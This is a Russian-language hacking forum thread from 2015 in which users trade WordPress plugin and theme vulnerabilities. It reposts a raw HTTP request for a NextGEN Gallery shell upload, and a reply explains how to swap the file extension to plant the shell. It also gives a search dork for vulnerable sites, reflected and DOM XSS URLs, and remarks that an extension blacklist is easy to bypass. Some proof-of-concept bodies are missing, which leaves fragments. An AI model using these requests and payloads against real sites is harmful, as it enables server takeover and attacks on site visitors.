 |
|
27.04.2015, 12:54
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
WordPress 4.2 stored XSS
Сообщение от None
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes so the comment
has to be quite long.
The truncation results in malformed HTML generated on the page. The
attacker can supply any attributes in the allowed HTML tags, in the same
way as the previous stored XSS vulnerabilities affecting WordPress.
The vulnerability bears a similarity to the one reported by Cedric Van
Bockhaven in 2014 (patched this week, after 14 months). Instead of using an
invalid UTF-8 character to truncate the comment, this time an excessively
long comment text is used for the same effect.
In these two cases the injected JavaScript apparently can't be triggered in
the administrative Dashboard, so these exploits require getting around
comment moderation e.g. by posting one harmless comment first.
*Proof of Concept*
Enter the following as a comment:
This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53
and 5.5.41.
*Solution*
Disable comments (Dashboard, Settings/Discussion, select as restrictive
options as possible). Do not approve any comments.
*Credits*
The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.
An up-to-date version of this document:
http://klikki.fi/adv/wordpress2.html
|
|
|
29.04.2015, 16:31
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 143
С нами:
9533255
Репутация:
95
|
|
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
Код:
WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg
The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #
Подскажите пожалуйста как этим чудом пользоваться?
|
|
|
|
29.04.2015, 16:37
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от ICQ Hool
ICQ Hool said:
↑
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
Код:
WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg
The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #
Подскажите пожалуйста как этим чудом пользоваться?нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
шелл будет по адресу /wp-content/gallery/folder_name/shell.php
|
|
|
|
29.04.2015, 19:54
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от winstrool
↑
MAC PHOTO GALLERY v. 2.7
MAC PHOTO GALLERY
dork: inurl
lugins/mac-dock-gallery/ download
@version:2.7
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]"/uploads/mac-dock-gallery/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'albid'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Description: File Transfer'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Type: application/octet-stream'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Disposition: attachment; filename='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Transfer-Encoding: binary'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Expires: 0'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Cache-Control: must-revalidate, post-check=0, pre-check=0'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Pragma: public'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Length: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]filesize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]ob_clean[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]flush[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
POC:
PATCH:
https://wordpress.org/plugins/mac-do...y/other_notes/
Ну и xss там же
Код:
http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1">&limit=42
|
|
|
|
13.05.2015, 19:28
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions: 4.2.1 and probably below
Proof of Concept URL for DOM XSS in WordPress:
Код:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#
Source: http://seclists.org/bugtraq/2015/May/56 |
|
|
|
13.05.2015, 20:08
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от VY_CMa
↑
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions:
4.2.1
and probably below
Proof of Concept URL for DOM XSS in WordPress:
Код:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#
Source:
http://seclists.org/bugtraq/2015/May/56
Или вот такой вектор для Хрома
[QUOTE="None"]
[URL="http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#1
[/QUOTE]
|
|
|
|
22.05.2015, 20:54
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами:
9533780
Репутация:
97
|
|
Сообщение от faza02
↑
нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
шелл будет по адресу /wp-content/gallery/folder_name/shell.php
А разве для этого не нужны админ права?
|
|
|
|
05.06.2015, 00:38
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
В паблике была опубликована такая бага:
https://www.exploit-db.com/exploits/37166/ - [SIZE="2"][B]WordPress dzs-zoomsounds Plugins invalid extension - disallowed_filetypeshideFeedbacksCall()'[/COLOR] );
}
if (!is_writable($upload_dir)) {
die('dir not writable - check permissionshideFeedbacksCall()');
}
if (copy($_FILES['file_field']['tmp_name'],$path)) {
echo'file uploadedtop.hideFeedbacksCall();';
} else {
echo'file could not be uploadedwindow.hideFeedback sCall()';
}
} else {
$headers=get_theheaders();
if (isset($headers['HTTP_X_FILE_NAME'])) {
//print_r($headers);
$file_name=$headers['HTTP_X_FILE_NAME'];
$file_name=str_replace(" ","_",$file_name);// strip spaces
$target=$upload_dir."/".$file_name;
//==== checking for disallowed file types
$sw=false;
foreach ($disallowed_filetypesas$dft) {
$pos=strpos($file_name,$dft);
if ($pos!==false) {
$sw=true;
}
}
if ($sw==true) {
die('invalid extension - disallowed_filetypes');
}
if (!is_writable($upload_dir)) {
die('dir not writable - check permissions');
}
//echo $target;
$content=file_get_contents("php://input");
if (file_put_contents($target,$content)) {
echo'success';
} else {
die('error at file_put_contents');
}
} else {
die('not for direct access');
}
}[/COLOR]
[/PHP]
максимальная строчка с набором расширений на глаза попалась такая:
$disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');
но кто поймет этот участок кода:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]foreach ([/COLOR][COLOR="#0000BB"]$disallowed_filetypes[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$dft[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$pos[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dft[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$pos[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$sw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
поймет что нам это не помеха ;-)
Пассивные XSS:
wp-content/plugins/dzs-videogallery/ajax.php?source="/>alert();
wp-content/plugins/dzs-videogallery/ajax.php?type="/>alert();
http://digitalzoomstudio.net/ - блог автора
http://codecanyon.net/user/ZoomIt/portfolio - портфолио продаж компонентов
P.S: Тэги для гугла)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit |
|
|
|
05.06.2015, 22:34
|
|
Новичок
Регистрация: 01.12.2010
Сообщений: 23
С нами:
8129846
Репутация:
0
|
|
Сообщение от winstrool
↑
foreach (
$disallowed_filetypes
as
$dft
) {
$pos
=
strpos
(
$file_name
,
$dft
);
if (
$pos
!==
false
) {
$sw
=
true
;
}
}
А как такое обходиться ?
|
|
|
|
05.06.2015, 22:51
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
